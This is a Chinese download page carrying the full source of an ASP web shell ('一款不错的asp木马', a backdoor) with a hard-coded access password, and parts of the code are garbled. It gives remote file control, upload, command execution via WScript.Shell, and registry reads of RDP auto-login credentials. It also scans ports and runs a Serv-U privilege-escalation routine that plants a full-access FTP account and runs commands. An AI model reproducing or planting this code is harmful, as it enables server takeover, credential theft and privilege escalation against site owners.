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【下载文档:  一款不错的asp木马_黑色界面.txt 】

一款不错的asp木马 黑色界面
<% Server.ScriptTimeout=999999999 Response.Buffer =true On Error Resume Next UserPass="643617" '密码 mName="BY:.尐飛" '后门名字 Copyright="注:请勿用于非法用途,否则后果作者概不负责" '版权 Server.ScriptTimeout=999999999 Response.Buffer =true On Error Resume Next sub ShowErr() If Err Then RRS"

" & Err.Description & "

" Err.Clear:Response.Flush End If end sub Sub RRS(str) response.write(str) End Sub Function RePath(S) RePath=Replace(S,"\","\\") End Function Function RRePath(S) RRePath=Replace(S,"\\","\") End Function URL=Request.ServerVariables("URL") ServerIP=Request.ServerVariables("LOCAL_ADDR") Action=Request("Action") RootPath=Server.MapPath(".") WWWRoot=Server.MapPath("/") serveru=request.servervariables("http_host")&url serverp=userpass FolderPath=Request("FolderPath") FName=Request("FName") BackUrl="

" RRS"" RRS""&mName1&" - "&ServerIP&" " RRS"" RRS"" rrs "" Dim ObT(13,2) ObT(0,0) = "Scripting.FileSystemObject" ObT(0,2) = "文件操作组件" ObT(1,0) = "" ObT(1,2) = "命令行执行组件" ObT(2,0) = "ADOX.Catalog" ObT(2,2) = "ACCESS建库组件" ObT(3,0) = "JRO.JetEngine" ObT(3,2) = "ACCESS压缩组件" ObT(4,0) = "Scripting.Dictionary" ObT(4,2) = "数据流上传辅助组件" ObT(5,0) = "Adodb.connection" ObT(5,2) = "数据库连接组件" ObT(6,0) = "Adodb.Stream" ObT(6,2) = "数据流上传组件" ObT(7,0) = "SoftArtisans.FileUp" ObT(7,2) = "SA-FileUp 文件上传组件" ObT(8,0) = "LyfUpload.UploadFile" ObT(8,2) = "刘云峰文件上传组件" ObT(9,0) = "Persits.Upload.1" ObT(9,2) = "ASPUpload 文件上传组件" ObT(10,0) = "JMail.SmtpMail" ObT(10,2) = "JMail 邮件收发组件" ObT(11,0) = "CDONTS.NewMail" ObT(11,2) = "虚拟SMTP发信组件" ObT(12,0) = "SmtpMail.SmtpMail.1" ObT(12,2) = "SmtpMail发信组件" ObT(13,0) = "Microsoft.XMLHTTP" ObT(13,2) = "数据传输组件" For i=0 To 13 Set T=Server.CreateObject(ObT(i,0)) If -2147221005 <> Err Then IsObj=" √" Else IsObj=" ×" Err.Clear End If Set T=Nothing ObT(i,1)=IsObj Next If FolderPath<>"" then Session("FolderPath")=RRePath(FolderPath) End If If Session("FolderPath")="" Then FolderPath=RootPath Session("FolderPath")=FolderPath End if Function MainForm() RRS"
" RRS"" RRS"" RRS"
" RRS"" RRS"" RRS"
" RRS"" RRS"" RRS"
地址栏:" RRS"" RRS" " RRS"
" RRS"" RRS"" RRS"
" End Function if request("web")="admin" then Session("web2a2dmin") = UserPass URL() end if Function MainForm() RRS"
" RRS"" RRS"" RRS"
" RRS"" RRS"" RRS"
" RRS"" RRS"" RRS"
地址栏:" RRS"" RRS" " RRS"
" RRS"" RRS"" RRS"
" End Function Function MainMenu() RRS"" RRS"" RRS"" If ObT(0,1)=" ×" Then RRS"" Else RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" End If RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"

" RRS"
↓查看硬 盘
→Program Files
- >pcAnywhere
->开始 程序
→ 系统服务-用户账号
→ Serv-u提权
→ 读取注册表
→ 上传文件
→查 找木马
→退出登 录

" RRS"" End Function Sub unPack(thePath) On Error Resume Next Server.ScriptTimeOut = 5000 Dim rs, ws, str, conn, stream, connStr, theFolder str = Server.MapPath(".") & "\" Set rs = CreateObject("ADODB.RecordSet") Set stream = CreateObject("ADODB.Stream") Set conn = CreateObject("ADODB.Connection") connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";" conn.Open connStr rs.Open "FileData", conn, 1, 1 stream.Open stream.Type = 1 Do Until rs.Eof theFolder = Left(rs("thePath"), InStrRev(rs ("thePath"), "\")) If fsoX.FolderExists(str & theFolder) = False Then createFolder(str & theFolder) End If stream.SetEos() stream.Write rs("fileContent") stream.SaveToFile str & rs("thePath"), 2 rs.MoveNext Loop rs.Close conn.Close stream.Close Set ws = Nothing Set rs = Nothing Set stream = Nothing Set conn = Nothing End Sub Sub createFolder(thePath) Dim i i = Instr(thePath, "\") Do While i > 0 If fsoX.FolderExists(Left(thePath, i)) = False Then fsoX.CreateFolder(Left(thePath, i - 1)) End If If InStr(Mid(thePath, i + 1), "\") Then i = i + Instr(Mid(thePath, i + 1), "\") Else i = 0 End If Loop End Sub Function Course() SI="
" SI=SI&"" on error resume next for each obj in getObject("WinNT://.") err.clear if OBJ.StartType="" then SI=SI&"" SI=SI&"" SI0="" end if if OBJ.StartType=2 then lx="自动" if OBJ.StartType=3 then lx="手动" if OBJ.StartType=4 then lx="禁用" if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then SI1=SI1&"" else SI2=SI2&"" end if next RRS SI&SI0&SI1&SI2&"
系 统用户与服务
" SI=SI&obj.Name SI=SI&" " SI=SI&"系统用户(组)" SI=SI&"
"&obj.Name&" "&obj.DisplayName&"
[启动类型:"&lx&"] "&obj.path&"
"&obj.Name&" "&obj.DisplayName&"
[启动类型:"&lx&"] "&obj.path&"
" End Function Function ServerInfo() SI="
" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" For i=0 To 13 SI=SI&"" Next RRS SI End Function Function DownFile(Path) Response.Clear Set OSM = CreateObject(ObT(6,0)) OSM.Open OSM.Type = 1 OSM.LoadFromFile Path sz=InstrRev(path,"\")+1 Response.AddHeader "Content-Disposition", "attachment; filename=" & Mid(path,sz) Response.AddHeader "Content-Length", OSM.Size Response.Charset = "UTF-8" Response.ContentType = "application/octet-stream" Response.BinaryWrite OSM.Read Response.Flush OSM.Close Set OSM = Nothing End Function Function HTMLEncode(S) if not isnull(S) then S = replace(S, ">", ">") S = replace(S, "<", "<") S = replace(S, CHR(39), "'") S = replace(S, CHR(34), """) S = replace(S, CHR(20), " ") HTMLEncode = S end if End Function Function UpFile() If Request("Action2")="Post" Then Set U=new UPC : Set F=U.UA("LocalFile") UName=U.form("ToPath") If UName="" Or F.FileSize=0 then SI="
请输入上传的完全路径后选择一个文件上传!" Else F.SaveAs UName If Err.number=0 Then SI="

" End if End If Set F=nothing:Set U=nothing SI=SI&BackUrl RRS SI ShowErr() Response.End End If SI="

服 务器组件信息
服务器名 "&request.serverVariables("SERVER_NAME")&"
服务器IP " SI=SI&"
服务器时间 "&now&"
服务器CPU数量 "&Request.ServerVariables("NUMBER_OF_PROCESSORS") &"
服务器操作系统 "&Request.ServerVariables("OS")&"
WEB服务器版本 "&Request.ServerVariables("SERVER_SOFTWARE") &"
"&ObT(i,0)&""&ObT(i,1) &""&ObT(i,2)&"
" SI=SI&"" SI=SI&"
" SI=SI&"上传路径:" SI=SI&" " SI=SI&" " SI=SI&"
" RRS SI End Function Function Cmd1Shell() checked=" checked" If Request("SP")<>"" Then Session("ShellPath") = Request("SP") ShellPath=Session("ShellPath") if ShellPath="" Then ShellPath = "diy3.asp" if Request("wscript")<>"yes" then checked="" If Request("cmd")<>"" Then DefCmd = Request("cmd") SI="
" SI=SI&"SHELL路径: " SI=SI&"WScript.Shell" SI=SI&"
" RRS SI End Function if session("web2a2dmin")<>UserPass then if request.form("pass")<>"" then if request.form("pass")=UserPass then session("web2a2dmin")=UserPass response.redirect url else rrs"

注: 请勿用于非法用途,否则后果自负!!!

HACK by:漫步云端

" end if else si="

" if instr(SI,SIC)<>0 then rrs sI end if response.end end if Dim T1 Class UPC Dim D1,D2 Public Function Form(F) F=lcase(F) If D1.exists(F) then:Form=D1(F):else:Form="":end if End Function Public Function UA(F) F=lcase(F) If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if End Function Private Sub Class_Initialize Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName set D1=CreateObject(ObT(4,0)) if Request.TotalBytes<1 then Exit Sub set T1 = CreateObject(ObT(6,0)) T1.Type = 1 : T1.Mode =3 : T1.Open T1.Write Request.BinaryRead(Request.TotalBytes) T1.Position=0 : TDa =T1.Read : DStart = 1 DEnd = LenB(TDa) set D2=CreateObject(ObT(4,0)) vbCrlf = chrB(13) & chrB(10) set T2 = CreateObject(ObT(6,0)) TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1) TLen = LenB (TSt) DStart=DStart+TLen+1 while (DStart + 10) < DEnd DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3 T2.Type = 1 : T2.Mode =3 : T2.Open T1.Position = DStart T1.CopyTo T2,DIEnd-DStart T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312" TIn = T2.ReadText : T2.Close DStart = InStrB(DIEnd,TDa,TSt) FStart = InStr(22,TIn,"name=""",1)+6 FEnd = InStr(FStart,TIn,"""",1) UpName = lcase(Mid (TIn,FStart,FEnd-FStart)) if InStr (45,TIn,"filename=""",1) > 0 then set TFL=new FIF FStart = InStr(FEnd,TIn,"filename=""",1)+10 FEnd = InStr(FStart,TIn,"""",1) FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14 FEnd = InStr(FStart,TIn,vbCr) TFL.FileStart =DIEnd TFL.FileSize = DStart -DIEnd -3 if not D2.Exists(UpName) then D2.add UpName,TFL end if else T2.Type =1 : T2.Mode =3 : T2.Open T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3 T2.Position = 0 : T2.Type = 2 T2.Charset ="gb2312" SFV = T2.ReadText T2.Close if D1.Exists(UpName) then D1(UpName)=D1(UpName)&", "&SFV else D1.Add UpName,SFV end if end if DStart=DStart+TLen+1 wend TDa="" set T2 =nothing End Sub Private Sub Class_Terminate if Request.TotalBytes>0 then D1.RemoveAll:D2.RemoveAll set D1=nothing:set D2=nothing T1.Close:set T1 =nothing end if End Sub End Class Class FIF dim FileSize,FileStart Private Sub Class_Initialize FileSize = 0 FileStart= 0 End Sub Public function SaveAs(F) dim T3 SaveAs=true if trim(F)="" or FileStart=0 then exit function set T3=CreateObject(ObT(6,0)) T3.Mode=3 : T3.Type=1 : T3.Open T1.position=FileStart T1.copyto T3,FileSize T3.SaveToFile F,2 T3.Close set T3=nothing SaveAs=false end function End Class Class LBF Dim CF Private Sub Class_Initialize SET CF=CreateObject(ObT(0,0)) End Sub Private Sub Class_Terminate Set CF=Nothing End Sub Function ShowDriver() For Each D in CF.Drives RRS" 本地磁盘 ("&D.DriveLetter&":)
" Next End Function Function Show1File(Path) Set FOLD=CF.GetFolder(Path) i=0 SI="" For Each F in FOLD.subfolders SI=SI&"" i=i+1 If i mod 3 = 0 then SI=SI&"" Next SI=SI&"
" SI=SI&"0"&F.Name&"" SI=SI&" _复制" SI=SI&" 删除" SI=SI&" 移动" SI=SI&" 下载
" RRS SI &"
" : SI="" For Each L in Fold.files SI="" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"
" RRS SI:SI="" Next Set FOLD=Nothing End function Function DelFile(Path) If CF.FileExists(Path) Then CF.DeleteFile Path SI="

文件 "&Path&" 删除成功!
" SI=SI&BackUrl RRS SI End If End Function Function EditFile(Path) If Request("Action2")="Post" Then Set T=CF.CreateTextFile(Path) T.WriteLine Request.form("content") T.close Set T=nothing SI="

" SI=SI&BackUrl RRS SI Response.End End If If Path<>"" Then Set T=CF.opentextfile(Path, 1, False) Txt=HTMLEncode(T.readall) T.close Set T=Nothing Else Path=Session("FolderPath")&"\newfile.asp":Txt="新建文件" End If SI=SI&"" SI=SI&"" SI=SI&"
" SI=SI&"
" SI=SI&"
" RRS SI End Function Function CopyFile(Path) Path = Split(Path,"||||") If CF.FileExists(Path(0)) and Path(1)<>"" Then CF.CopyFile Path(0),Path(1) SI="

" SI=SI&BackUrl RRS SI End If End Function Function MoveFile(Path) Path = Split(Path,"||||") If CF.FileExists(Path(0)) and Path(1)<>"" Then CF.MoveFile Path(0),Path(1) SI="

" SI=SI&BackUrl RRS SI End If End Function Function DelFolder(Path) If CF.FolderExists(Path) Then CF.DeleteFolder Path SI="

" SI=SI&BackUrl RRS SI End If End Function Function CopyFolder(Path) Path = Split(Path,"||||") If CF.FolderExists(Path(0)) and Path(1)<>"" Then CF.CopyFolder Path(0),Path(1) SI="

" SI=SI&BackUrl RRS SI End If End Function Function MoveFolder(Path) Path = Split(Path,"||||") If CF.FolderExists(Path(0)) and Path(1)<>"" Then CF.MoveFolder Path(0),Path(1) SI="

" SI=SI&BackUrl RRS SI End If End Function Function NewFolder(Path) If Not CF.FolderExists(Path) and Path<>"" Then CF.CreateFolder Path SI="

" SI=SI&BackUrl RRS SI End If End Function End Class sub getTerminalInfo() On Error Resume Next Set wsX = Server.CreateObject("WScript.Shell") Dim terminalPortPath, terminalPortKey, termPort Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername, autoLoginPassword terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" terminalPortKey = "PortNumber" termPort = wsX.RegRead(terminalPortPath & terminalPortKey) RRS "终端服务端口及自动登录
    " If termPort = "" Or Err.Number <> 0 Then RRS"无法得到终端服务端口, 请检查权限是否已经受到限制.
    " Else RRS "当前终端服务端口: " & termPort & "
    " End If autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\" autoLoginEnableKey = "AutoAdminLogon" autoLoginUserKey = "DefaultUserName" autoLoginPassKey = "DefaultPassword" isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey) If isAutoLoginEnable = 0 Then RRS "系统自动登录功能未开启
    " Else autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey) RRS "自动登录的系统帐户: " & autoLoginUsername & "
    " autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey) If Err Then Err.Clear RRS "False" End If RRS "自动登录的帐户密码: " & autoLoginPassword & "
    " End If RRS "
" End Sub sub ReadREG() RRS "注册表键值读取:
" RRS "
" RRS "" RRS "" RRS " " RRS "" RRS "

" if Request("thePath")<>"" then On Error Resume Next Set wsX = Server.CreateObject("WScript.Shell") thePath=Request("thePath") theArray=wsX.RegRead(thePath) If IsArray(theArray) Then For i=0 To UBound(theArray) RRS "
  • " & theArray(i) Next Else RRS "
  • " & theArray End If end if end sub sub ScanPort() Server.ScriptTimeout = 7776000 if request.Form("port")="" then PortList="21,23,25,80,110,135,139,445,1433,3389,43958" else PortList=request.Form("port") end if if request.Form("ip")="" then IP="" else IP=request.Form("ip") end if RRS"


    " RRS"
    " RRS"

    Scan IP: " RRS" " RRS"
    Port List:" RRS"" RRS"

    " RRS"" RRS"" RRS"

    " If request.Form("scan") <> "" Then timer1 = timer RRS("扫描报告:

    ") tmp = Split(request.Form("port"),",") ip = Split(request.Form("ip"),",") For hu = 0 to Ubound(ip) If InStr(ip(hu),"-") = 0 Then For i = 0 To Ubound(tmp) If Isnumeric(tmp(i)) Then Call Scan(ip(hu), tmp(i)) Else seekx = InStr(tmp(i), "-") If seekx > 0 Then startN = Left(tmp(i), seekx - 1 ) endN = Right(tmp(i), Len(tmp(i)) - seekx ) If Isnumeric(startN) and Isnumeric(endN) Then For j = startN To endN Call Scan(ip(hu), j) Next Else RRS(startN & " or " & endN & " is not number
    ") End If Else RRS(tmp(i) & " is not number
    ") End If End If Next Else ipStart = Mid(ip(hu),1,InStrRev(ip(hu),".")) For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip (hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-")) For i = 0 To Ubound(tmp) If Isnumeric(tmp(i)) Then Call Scan(ipStart & xxx, tmp(i)) Else seekx = InStr(tmp(i), "-") If seekx > 0 Then startN = Left(tmp(i), seekx - 1 ) endN = Right(tmp(i), Len(tmp(i)) - seekx ) If Isnumeric(startN) and Isnumeric(endN) Then For j = startN To endN Call Scan(ipStart & xxx,j) Next Else RRS(startN & " or " & endN & " is not number
    ") End If Else RRS(tmp(i) & " is not number
    ") End If End If Next Next End If Next timer2 = timer thetime=cstr(int(timer2-timer1)) RRS"
    Process in "&thetime&" s" END IF end sub Sub Scan(targetip, portNum) On Error Resume Next set conn = Server.CreateObject("ADODB.connection") connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;" conn.ConnectionTimeout = 1 connstr If Err Then If Err.number = -2147217843 or Err.number = -2147467259 Then If InStr(Err.description, "(Connect()).") > 0 Then RRS(targetip & ":" & portNum & ".........关闭
    ") Else RRS(targetip & ":" & portNum & ".........开放
    ") End If End If End If End Sub Select Case Action Case "MainMenu":MainMenu() Case "getTerminalInfo":getTerminalInfo() case "ScanPort":ScanPort() Case "Servu" SUaction=request("SUaction") if not isnumeric(SUaction) then response.end user = trim(request("u")) pass = trim(request("p")) port = trim(request("port")) cmd = trim(request("c")) f=trim(request("f")) if f="" then f=gpath() else f=left(f,2) end if ftpport = 65500 timeout=3 loginuser = "User " & user & vbCrLf loginpass = "Pass " & pass & vbCrLf deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=" & vbCrLf & " PortNo=" & ftpport & vbCrLf mt = "SITE MAINTENANCE" & vbCrLf newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun||" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf newuser = "-SETUSERSETUP" & vbCrLf & "-IP=" & vbCrLf & "- PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _ "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "- Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _ "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "- AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _ "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _ "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "- SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _ "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "- QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _ "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf quit = "QUIT" & vbCrLf newuser=replace(newuser,"c:",f) select case SUaction case 1 set a=Server.CreateObject("Microsoft.XMLHTTP") "GET", "" & port & "/goldsun/upadmin/s1",True, "", "" a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit set session("a")=a RRS"
    " RRS"" RRS"" RRS"" RRS"" RRS"" RRS"
    " RRS"" case 2 set b=Server.CreateObject("Microsoft.XMLHTTP") "GET", "" & ftpport & "/goldsun/upadmin/s2", True, "", "" b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit set session("b")=b RRS"
    " RRS"" RRS"" RRS"" RRS"" RRS"" RRS"
    " RRS"" case 3 set c=Server.CreateObject("Microsoft.XMLHTTP") "GET", "" & port & "/goldsun/upadmin/s3", True, "", "" a.send loginuser & loginpass & mt & deldomain & quit set session("a")=a RRS"

    " RRS"" RRS"
    " case else on error resume next set a=session("a") set b=session("b") set c=session("c") a.abort Set a = Nothing b.abort Set b = Nothing c.abort Set c = Nothing RRS"
    " RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS" " RRS" " RRS" " RRS" " RRS" " RRS" " RRS" " RRS" " RRS"
    Serv-U 提升权限 漫步云端修改版
    口 令:
    端 口:
    命 令:
    " RRS"" RRS"
    " end select function Gpath() on error resume next err.clear set f=Server.CreateObject("Scripting.FileSystemObject") if err.number>0 then gpath="c:" exit function end if gpath=f.GetSpecialFolder(0) gpath=lcase(left(gpath,2)) set f=nothing end function Case "kmuma" dim Report if request.QueryString("act")<>"scan" then RRS ("网站根目录- "&Server.MapPath("/")&"
    ") RRS ("本程序目录- "&Server.MapPath(".")) RRS "
    " RRS "

    填入你要检查的路径:" RRS " 填“\”网站 根目录;“.”为本程序目录

    " RRS "你要干什么: 查ASP 马" RRS "搜索符合条件之文件
    " RRS "

    " RRS " 查找内容:" RRS " 要查找的字符串,不填就只进行日期检查
    " RRS " 修改日期: 多个日期用;隔开,任意日期填写 ALL
    " RRS " 文件类型: 类型之间用,隔开,*表示所有类型

    " RRS "" RRS "
    " else if request.Form("path")="" then RRS("路径不能为空") response.End() end if if request.Form("path")="\" then TmpPath = Server.MapPath("\") elseif request.Form("path")="." then TmpPath = Server.MapPath(".") else TmpPath = request.Form("path") end if timer1 = timer Sun = 0 SumFiles = 0 SumFolders = 1 If request.Form("radiobutton") = "sws" Then DimFileExt = "asp,cer,asa,cdx" Call ShowAllFile(TmpPath) Else If request.Form("path") = "" or request.Form ("Search_Date") = "" or request.Form("Search_FileExt") = "" Then RRS("缉捕条件不完全

    请返回重新输入") response.End() End If DimFileExt = request.Form("Search_fileExt") Call ShowAllFile2(TmpPath) End If RRS "" RRS "" RRS "" Sun = Sun + 1 temp="-=| 同上 |=-" End if If instr( filetxt, Lcase ("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase ("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then Report = Report&"" Sun = Sun + 1 temp="-=| 同上 |=-" End If Set regEx = New RegExp regEx.IgnoreCase = True regEx.Global = True regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s* (vbscript|jscript|javascript).encode\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-=| 同上 |=-" End If regEx.Pattern = "\bEv"&"al\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-=| 同上 |=-" End If regEx.Pattern = "[^.]\bExe"&"cute\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-=| 同上 |=-" End If regEx.Pattern = "\.(Open|Create)TextFile\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-=| 同上 |=-" End If regEx.Pattern = "\.SaveToFile\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-=| 同上 |=-" End If regEx.Pattern = "\.Save\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-=| 同上 |=-" End If Set regEx = Nothing Set regEx = New RegExp regEx.IgnoreCase = True regEx.Global = True regEx.Pattern = "


    Scan WebShell -- 漫步云端修改版
    " RRS "
    " RRS "扫描完毕!一共检查文件夹"&SumFolders&"个,文件"&SumFiles&"个,发现可疑点"&Sun&"个" RRS "" If request.Form("radiobutton") = "sws" Then RRS "" RRS "" RRS "" RRS "" else RRS "" RRS "" RRS "" end if RRS "" RRS Report RRS "
    " timer2 = timer thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10) RRS "
    本页执行共用了"&thetime&"毫秒 " end if Sub ShowAllFile(Path) Set F1SO = CreateObject("Scripting.FileSystemObject") if not F1SO.FolderExists(path) then exit sub Set f = F1SO.GetFolder(Path) Set fc2 = f.files For Each myfile in fc2 If CheckExt(F1SO.GetExtensionName (path&"\"& Then Call ScanFile(Path&Temp&"\"&, "") SumFiles = SumFiles + 1 End If Next Set fc = f.SubFolders For Each f1 in fc ShowAllFile path&"\"& SumFolders = SumFolders + 1 Next Set F1SO = Nothing End Sub Sub ScanFile(FilePath, InFile) Server.ScriptTimeout=999999999 If InFile <> "" Then Infiles = "该文件被"& InFile & "文件包含执行" End If Set FSO1s = CreateObject("Scripting.FileSystemObject") on error resume next set ofile = FSO1s.OpenTextFile(FilePath) filetxt = Lcase(ofile.readall()) If err Then Exit Sub end if if len(filetxt)>0 then filetxt = vbcrlf & filetxt temp = ""&replace (FilePath,server.MapPath("\")&"\","",1,1,1)&"
    " temp=temp&"编辑 " temp=temp&"删除 " temp=temp&"复制 " temp=temp&"移动" If instr( filetxt, Lcase ("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase ("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then Report = Report&"
    "&temp&"WScr"&DoMyBest&"ipt.Shell 或者 clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8危险组件,一般被ASP木马利用 "&infiles&""&GetDateCreate(filepath) &"
    "&temp&"She"&DoMyBest&"ll.Application 或者 clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000危险组件,一般被ASP木马利用 "&infiles&""&GetDateCreate(filepath) &"
    "&temp&" (vbscript|jscript|javascript).Encode似乎脚本被 加密了"&infiles&""&GetDateCreate(filepath) &"
    "&temp&"Ev"&"ale"&"val()函数可以执行 任意ASP代码
    但是javascript代码中也可以使用,有可能是误 报。"&infiles&"
    "&GetDateModify (filepath)&"
    "&GetDateCreate(filepath) &"
    "&temp&".CreateTextFile|.OpenTextFile 使用了FSO的CreateTextFile|OpenTextFile读写文 件"&infiles&""&GetDateCreate(filepath)&"
    "&GetDateModify (filepath)&"
    "&temp&".SaveToFile使用了Stream的 SaveToFile函数写文件"&infiles&""&GetDateCreate(filepath) &"
    "&temp&".Save使用了XMLHTTP的Save函数 写文件"&infiles&""&GetDateCreate(filepath) &"